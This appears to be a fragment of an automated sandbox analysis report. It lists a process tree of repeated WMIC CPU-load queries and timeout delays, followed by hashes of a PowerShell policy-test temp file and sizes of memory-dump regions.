C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zpyav3vz.zhk.psm1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/2836-0-0x00007FFD124B3000-0x00007FFD124B5000-memory.dmpFilesize
8KB
-
memory/2836-3-0x0000019A5B4F0000-0x0000019A5B512000-memory.dmpFilesize
136KB
-
memory/2836-10-0x00007FFD124B0000-0x00007FFD12F72000-memory.dmpFilesize
10.8MB
-
memory/2836-11-0x00007FFD124B0000-0x00007FFD12F72000-memory.dmpFilesize
10.8MB
-
memory/2836-12-0x00007FFD124B0000-0x00007FFD12F72000-memory.dmpFilesize
10.8MB
-
memory/2836-15-0x00007FFD124B0000-0x00007FFD12F72000-memory.dmpFilesize
10.8MB